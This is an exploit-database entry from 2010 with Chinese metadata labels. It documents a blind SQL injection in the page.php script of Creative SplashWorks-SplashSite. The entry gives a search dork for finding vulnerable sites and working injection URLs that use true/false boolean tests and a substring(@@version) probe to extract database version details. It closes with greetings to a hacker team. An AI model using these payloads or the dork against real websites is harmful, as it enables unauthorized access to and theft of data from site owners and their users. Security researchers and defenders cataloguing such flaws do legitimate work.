Creative SplashWorks-SplashSite – ‘page.php’ Blind SQL Injection

  • 作者: AtT4CKxT3rR0r1ST
    日期: 2010-01-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11300/
  • ####################################################################
    .:. Email : F.Hack@w.cn
    .:. Team : Sec Attack Team
    .:. Home : www.sec-attack.com/vb
    .:. Script : Creative SplashWorks-SplashSite
    .:. Language : php
    .:. Bug Type : Blind Sql Injection
    .:. Dork : "Website Powered By Creative SplashWorks - SplashSite"
    ####################################################################
    
    ===[ Exploit ]===
    
    www.site.com/page.php?pg=18+and+1=1 >>> True
    www.site.com/page.php?pg=18+and+1=2 >>> False
    
    www.site.com/page.php?pg=18+and+substring(@@version,1,1)=5 >>> True
    www.site.com/page.php?pg=18+and+substring(@@version,1,1)=4 >>> False
    
    
    ####################################################################
    
    Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack